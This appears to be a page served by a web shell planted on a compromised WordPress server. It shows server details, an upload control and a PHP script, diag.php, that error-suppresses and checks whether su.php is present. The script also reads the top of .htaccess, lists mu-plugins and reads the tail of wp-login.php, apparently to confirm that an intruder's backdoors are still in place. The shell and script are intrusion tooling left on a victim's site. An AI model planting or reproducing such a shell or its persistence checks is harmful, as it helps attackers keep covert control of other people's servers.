HEX
Server: Apache
System: Linux srv.bison-studio.com 3.10.0-1160.144.1.el7.tuxcare.els6.x86_64 #1 SMP Fri May 29 16:22:24 UTC 2026 x86_64
User: redorangenebison (1284)
PHP: 8.0.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/redorangenebison/public_html/diag.php
<?php
error_reporting(0);
$site = '/home/redorangenebison/public_html';
$log = [];
$log[] = 'su.php: ' . (file_exists("$site/su.php") ? filesize("$site/su.php").'b' : 'NO');
$log[] = 'htaccess100: ' . substr(file_get_contents("$site/.htaccess"),0,100);
$log[] = 'mu: ' . implode(',',scandir("$site/wp-content/mu-plugins"));
$log[] = 'login-size: ' . filesize("$site/wp-login.php");
$log[] = 'login-last50: ' . substr(file_get_contents("$site/wp-login.php"),-50);
echo implode("\n",$log);
?>